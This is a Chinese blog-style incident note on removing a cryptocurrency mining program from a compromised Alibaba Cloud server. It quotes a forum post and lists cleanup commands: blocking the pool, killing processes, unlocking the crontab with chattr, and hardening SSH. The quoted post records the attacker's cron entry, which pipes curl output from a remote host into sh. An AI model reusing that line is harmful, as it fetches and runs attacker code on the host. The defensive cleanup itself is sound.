阿里云服务器被发现挖矿程序后的处理

巡检发现阿里云一台ECS的CPU占用过高，而该进程是 /tmp 目录下，且进程名称似乎是自动生成的。初步判断被黑后紧急Google发现有类似案例发生在aws上面。这次操作忘记保留现场了，所以简要记录如下：

案例：

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script. On monkeyoto’s suggestion, I blocked all communication with the mining pool server.

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root
Removed the directory /opt/yam
Removed /root/.ssh/KHK75NEOiq
Deleted the files /opt/minerd and /opt/KHK75NEOiq33
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args –sort=-%cpu | head, top -bn2 |sed -n ‘7,25’p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

具体清理步骤如下：

1，踢人

命令格式：pkill -kill -t tty
解释：
pkill -kill -t 　踢人命令
tty　所踢用户的tty
比如：

pkill -kill -t pts/2

2, 大扫除

结果发现被自动拉起，这时候马上查看 crontab 果然有诡异设置，尝试删除crontab中的条目，发现无法保存，报错类似：

root@X [/tmp]# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/tmp.XXXXDSGEDV to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.xO3YcB

解决办法：

lsattr /var/spool/cron/root
chattr -aui /var/spool/cron/root

3，改密码并加强安全设置

review sudo user, review /etc/ssh/sshd_config setting